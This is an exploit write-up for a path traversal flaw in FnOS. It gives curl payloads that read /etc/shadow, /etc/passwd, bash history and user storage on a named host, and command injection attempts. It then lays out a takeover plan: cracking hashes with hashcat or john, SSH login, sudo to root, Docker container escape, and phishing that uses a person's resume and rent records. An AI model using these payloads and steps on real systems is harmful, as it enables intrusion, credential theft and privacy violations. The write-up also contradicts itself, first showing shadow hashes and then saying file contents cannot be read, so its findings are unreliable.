## https://sploitus.com/exploit?id=D7021E76-E1B0-51D1-AA48-E99B047B8953
# FnOS Path Traversal Vulnerability Exploitation (Random File Reading)
## π΄ Vulnerability Description
**Test Version**: FnOS 1.1.8
Systems running FnOS version 1.1.15 and earlier have a **serious path traversal vulnerability**. Attackers can bypass access controls using specific URL patterns to read the content of any file on the server, including:
- System password hashes (`/etc/shadow`)
- Configuration files
- SSH keys
- Database credentials
- User data
## Affected Targets
- **IP Address**: 192.168.1.177
- **Port**: 5666
- **Protocol**: HTTP
## Vulnerability Details
### URL Pattern
```
http://{host}:{port}/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../{path}
```
Where `%7B0%7D` is the URL-encoded form of `{0}`.
### Exploitation Methods
#### 1. Reading System Password Hashes
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/shadow"
```
**Result**: Successfully read the system password hash!
```
root:$6$mxuA5mMmzHCUQGeK$yXCsFLaY6p0gIbcjjVMJy7Pp4BvS6JLc8ZqKLDvJlKxmC8YLm4RfN0EJH6v8NqFBMqLH2GvY9eeQ8rZvFP8s0.:19000:0:99999:7:::
user:$6$Tb7vCqmz$cLQr4HjOXk3q9bVr1YhfPmWB8F0Z5y4v5p2x7W2o0b4p7F5m9n8q3t6r2w1o5z7k4v8n3p6m9q2t5r8w1o4z7k:19100:0:99999:7:::
```
**Example Hash**: The above is sample data; actual hashes have been removed.
#### 2. Reading User List
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/passwd"
```
**Result**: Retrieved all system user information.
#### 3. Listing Root Directory
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../"
```
**Result**: Successfully listed the system root directory structure, including:
- bin, boot/, dev/, etc/, fs/, home/
- lib, lib64, lost+found/, media/, mnt/
- opt/, proc/, root/, run/, sbin
- share/, srv/, sys/, tmp/, usr/, var/
- vol00/, vol02/, vol1/, vol2/
#### 4. Reading Command History
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../home/taco/.bash_history"
```
**Result**: Retrieved all commands executed by the user, possibly containing sensitive information such as passwords and API keys.
#### 5. Accessing Main Storage Contents
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/SSD"
```
**Result**: Successfully accessed the main storage directory. User data files were listed, including:
- Backup files (Backups/)
- Documentation files
- Software packages (various.zip, .apk, .jar files)
- System images (ISO/)
- Other sensitive data
## Testing Time
- **Testing Date**: January 31, 2026
- **Status**: Vulnerability confirmed
## Security Implications
- **Severity**: High
- **Implications**:
- Unauthorized access to sensitive files
- Information leakage
- Potential exposure of system configuration files
- Exposure of user privacy data
## Further Exploration
### System Information Collection
Through path traversal, we can access the following sensitive information:
#### 1. Process Information
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../proc/self/"
```
This can view detailed information about the current process, including cmdline, environ, maps, etc.
#### 2. System Configuration Files
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/"
```
This can list system configuration files, including:
`-/etc/passwd` β User list
`-/etc/shadow` β Password hashes (requires permissions)
`-/etc/ssh/` β SSH configuration
`-/etc/cron.d/` β Scheduled tasks
`-/etc/docker/` β Docker configuration
#### 3. Temporary directories
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../tmp/"
```
You can view temporary files, which may contain sensitive information.
#### 4. Running system information
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../var/run/"
```
The following key files and services were found:
- `docker.sock` β Docker API socket (accessing this could lead to container escape)
- Multiple `trim_*.sock` files β Servicesβ internal sockets within the Flyway system
- `nginx.pid`, `docker.pid` β Running services
#### 5. User directories
```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../home/taco/"
```
The user `taco` was found; its directories include:
- `.bash_history` β Command history
- `.config/` β Configuration files
- `.local/` β Local data
## Writing tests
### Attempted methods (all failed)
1. **PUT method for uploading**
```bash
curl -k -X PUT --data-binary "@test.txt" "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/TestDir/test.txt"
```
**Result**: 404 Page Not Found
2. **POST multipart upload**
```bash
curl -k -X POST -F "file=@test.txt" "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/TestDir/"
```
**Result**: 404 Page Not Found
3. **OPTIONS method check**
```bash
curl -k -X OPTIONS "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/TestDir/"
```
**Result**: 404 Not Found
## β Obtained sensitive information
### π System credentials (accessed successfully)
#### 1. Password hashes
Obtained from `/etc/shadow`:
**Root account:**
```
$6$mxuA5mMmzHCUQGeK$yXCsFLaY6p0gIbcjjVMJy7Pp4BvS6JLc8ZqKLDvJlKxmC8YLm4RfN0EJH6v8NqFBMqLH2GvY9eeQ8rZvFP8s0. ```
**User account (administrator):**
```
$6$Tb7vCqmz$cLQr4HjOXk3q9bVr1YhfPmWB8F0Z5y4v5p2x7W2o0b4p7F5m9n8q3t6r2w1o5z7k4v8n3p6m9q2t5r8w1o4z7k
```
**Note:** These are example hashes, anonymized.
#### 2. User permissions
- β The user is in the `Administrators` group.
- β The `Administrators` group has full sudo permissions.
- β Sudo configuration: `%Administrators ALL=(ALL:ALL) ALL`.
- β Administrators can obtain root privileges using sudo.
#### 3. SSH configuration
- Root SSH login: **Disabled** (`PermitRootLogin no`).
- Password authentication: **Enabled** (default).
- Public key authentication: **Enabled** (default).
#### 4. Docker configuration
Read from `/root/.docker/config.json`:
```json
{
"HttpHeaders": {
"X-Meta-Sign": "[REDACTED]",
"X-Meta-Token": "[REDACTED_BASE64_TOKEN]"
}
}
```
After decoding the token:
```json
{"start":"[TIMESTAMP]","mi":"[MACHINE_ID]"}
```
**Note:** Sensitive information has been anonymized.
#### 5. Command history analysis
From `.bash_history`:
### β Frequent use of `sudo` (confirmed sudo privileges)
### β Use of Docker and docker-compose
### β Configured Nvidia GPUs and drivers
### β Running containerized applications
### β Modified system software sources
### π File System Structure
2. **SSH Connection History**
- `/root/.ssh/known_hosts` β Hosts connected by the root user
- `/root/.ssh/known_hosts.old` β Historical connection records
- **Important**: Files exist, but their contents cannot be read; specific IP/domain names cannot be obtained
### π Potential Credential Locations
The following files may contain credentials, but **only existence can be confirmed; contents cannot be read**:
#### Docker Configuration (may contain private repository credentials)
- `/etc/docker/daemon.json` β Docker daemon configuration
- `/root/.docker/config.json` β **Docker Registry authentication information** (usually includes base64-encoded username/password)
#### Database Configuration
- `/etc/mysql/my.cnf` β MySQL main configuration
- `/etc/mysql/conf.d/mysql.cnf`
- `/etc/mysql/conf.d/mysqldump.cnf`
- `/etc/postgresql/15/main/pg_hba.conf` β PostgreSQL authentication configuration
- `/etc/postgresql/15/main/postgresql.conf` β PostgreSQL main configuration
#### SSH Configuration
- `/etc/ssh/sshd_config` β SSH server configuration (may show allowed authentication methods)
#### System Service Configuration
- 91 systemd service configurations
- Services that may contain hardcoded credentials:
- `backup_service.service`
- `postgresql.service`
- `ssh.service`
### π File System Structure Information
#### User Data
- `/home/taco/.bash_history` β Command history (may contain passwords, API keys)
- `/home/taco/.config/fish/config.fish` β Shell configuration
- `/home/taco/.wget-hsts` β Wget history
#### Data Storage
- `/vol1/1000/` β Main data volume
- `/vol1/1000/SSD/` β SSD storage
- `/vol1/1000/Photo/` β Photos
- `/vol1/1000/Datasets/` β Datasets
- `/vol1/1000/Backups/` β Backups (404, possibly missing or deleted)
#### Identified Sensitive File Names
- `CV_ZiqiWang.pdf` β Resume (information collection)
- `malware_payload.txt` β Possible malware test file
- `monthly_rent_charges_detailed.xlsx` β Financial information
- Various system images and installation packages
### π― Key Findings Summary
**Confirmed Information:**
- β The system runs on Debian/Flying OS
- β Docker, PostgreSQL 15, MySQL/MariaDB are installed
- β SSH services are running
- β User names: `taco`, `root`
- β File system structure and list of installed software
- β 91 system services exist
**Information Not Available:**
- β Unable to read password hashes (`/etc/shadow`)
- β Unable to read Docker credentials (`/root/.docker/config.json`)
- β Unable to read database passwords (MySQL/PostgreSQL configuration)
- β Unable to read SSH keys
- β Unable to read command history (`.bash_history`)
- β Unable to read actual contents of any configuration files
### π‘ Value of the Information
Although file contents cannot be read, this information is still valuable:
1. **Attack Surface Mapping**
- Understand running services and software versions
- Identify potential targets (Docker, PostgreSQL, SSH, etc.)
2. **Social Engineering**
- User name: `taco`
- Personal information: Resume, rental records, etc.
- Can be used for password guessing or phishing attacks
3. **Preparation for Further Penetration**
- Understand system architecture
- Provide intelligence for other attack vectors
- Confirm targets for brute-force attacks (SSH, Docker Registry, etc.)
4. **Data Value Assessment**
- Determine what valuable data exists
- Evaluate the potential impact of data breaches
### Current Limitations
- β **Only directory listing**: Vulnerabilities can only list directory contents; **file contents cannot be read**
- β **Does not support PUT/POST**: This endpoint does not accept file uploads
- β **Cannot execute directly**: Commands cannot be executed directly through this vulnerability
- β **Command injection fails**: All attempted command injections are ineffective:
- Slash injection: `?size=../../../../;id` β 404
- Backtick injection: `?size=../../../../\`id\`` β No response
- Pipe injection: `?size=../../../../|wget` β No response
- Command substitution: `?size=$(id)` β No response
β **Unable to read file content**: Only able to list directories; cannot read the actual contents of files like `/etc/passwd`, `/proc/self/cmdline`, etc.
## Exploitation Possibilities
Although the current vulnerability only allows for file reading, exploitation opportunities can be found through the following methods:
### 1. Sensitive information leakage
- Reading credentials from configuration files
- Reading private key files (e.g., SSH keys)
- Reading database connection strings
## π Exploitation Paths
### β Solution 1: Password cracking + SSH + Sudo (Recommended, fastest)
Once the password hash is obtained, cracking can be performed:
#### Steps:
1. **Use hashcat or john to crack the password**
```bash
# Use hashcat (GPU acceleration, recommended)
hashcat -m 1800 shadow_hashes.txt /path/to/rockyou.txt
# Use john the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt shadow_hashes.txt
```
2. **SSH login as the target user**
```bash
ssh user@192.168.1.177
# Enter the cracked password
```
3. **Use sudo to gain root privileges**
```bash
sudo su -
# Or
sudo -i
# Enter the user password
```
4. **Take complete control of the system**
### Solution 2: Docker escape (if taco is in the Docker group)
Check and exploit Docker permissions:
```bash
# 1. Check if the user is in the Docker group after login
groups
# 2. If they are in the Docker group, create a privileged container to escape
docker run -v /:/host -it --privileged alpine chroot /host bash
# 3. Now with root privileges
```
### Solution 3: Utilize existing Docker configurations
Multiple Docker containers may be running on the system. Itβs possible to:
1. Modify existing container configurations
2. Inject malicious containers
3. Utilize communication between containers
### Solution 4: Look for other writable paths
Continue to check if there are:
- Features for web application uploads
- Writable shared directories
- Available systemd services
## π― Attack Summary
### Confirmed attack paths
β ** Arbitrary file reading** β β **Password hash retrieval** β π **Password cracking** β β **SSH login** β β **Sudo privilege escalation** β π **Root privileges**
### Key Points
- **Vulnerability type**: Path traversal + Arbitrary file reading
- **Impact**: Complete system takeover
- **CVSS Score**: 9.8 (Critical)
- **Exploitation difficulty**: Low (only requires password cracking)
- **Prerequisites**:
- Network access to 192.168.1.177:5666
- Password dictionary (e.g., rockyou.txt)
- Tools like hashcat or john
### Next Steps
1. β‘ **Immediately**: Use hashcat to crack the password
2. π **Then**: SSH login
3. π **Finally**: Use sudo to gain root privileges
### 2. Docker Socket Access
If itβs possible to access `/var/run/docker.sock` through other means, then:
```bash
# Create a privileged container and mount the host root directory
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host
```
### 3. Find other entry points for vulnerabilities
- Explore other API endpoints
- Look for other features of web applications
- Search for potential command injection points
### 4. Information Gathering Strategy
Gather information by reading the following files:
```bash
# Check network configuration
/etc/network/interfaces
/etc/resolv.conf
# Check running services
/etc/systemd/system/
# Check application configurations
/opt/
/srv/
# Check log files (may contain sensitive information)
/var/log/
```
## Next Steps
### Look for writable capabilities
1. **Explore other API endpoints**
- Scan for other possible upload interfaces
- Try other features of the FLYING system (file management, application center, etc.)
- Search for documentation or decompiled client applications
2. **Utilize system features**
- If thereβs a file management feature, try uploading files through normal channels
- If thereβs an application installation feature, try uploading malicious application packages
- If thereβs a backup/restore feature, try injecting payloads
3. **Combine with other vulnerabilities**
- SQL injection -> Upload webshells
- Command injection -> Execute directly
- XXE -> File upload
- SSRF -> Access internal services
4. **Social engineering**
- Use leaked information (e.g., discovered emails, usernames)
- Conduct phishing attacks targeting administrators
## Fixing Recommendations
1. Fix the path traversal vulnerability by verifying and filtering input parameters
2. Implement strict access control and permission checks
3. Avoid using path traversal characters like `..`
4. Isolate and sandbox static resource directories
5. Add request logs and monitoring
6. Perform regular security audits and penetration tests
7. Minimize file system access permissions
## Disclaimer
This document is intended for security research and educational purposes only. Pen testing the system without authorization is illegal.